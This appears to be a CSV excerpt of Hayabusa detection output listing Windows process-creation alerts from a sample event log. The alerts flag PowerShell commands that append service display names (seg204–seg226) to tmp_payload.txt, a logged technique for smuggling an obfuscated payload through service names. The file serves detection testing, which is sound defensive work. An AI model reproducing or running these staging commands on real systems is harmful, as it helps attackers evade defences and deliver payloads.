+2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
